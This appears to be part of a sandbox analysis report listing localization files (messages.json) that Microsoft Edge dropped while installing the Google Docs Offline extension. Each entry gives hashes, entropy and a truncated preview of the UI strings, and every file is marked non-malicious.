                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):899
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                    MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                    SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                    SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                    SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2230
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                    MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                    SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                    SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                    SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1160
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                    MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                    SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                    SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                    SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3264
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                    MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                    SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                    SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                    SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3235
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                    MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                    SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                    SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                    SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                    MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                    SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                    SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                    SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1895
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                    MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                    SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                    SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                    SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1042
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                    MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                    SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                    SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                    SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2535
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                    MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                    SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                    SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                    SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1028
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                    MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                    SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                    SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                    SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):994
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                    MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                    SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                    SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                    SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2091
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                    MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                    SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                    SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                    SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2778
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                    MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                    SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                    SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                    SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                    Malicious:false
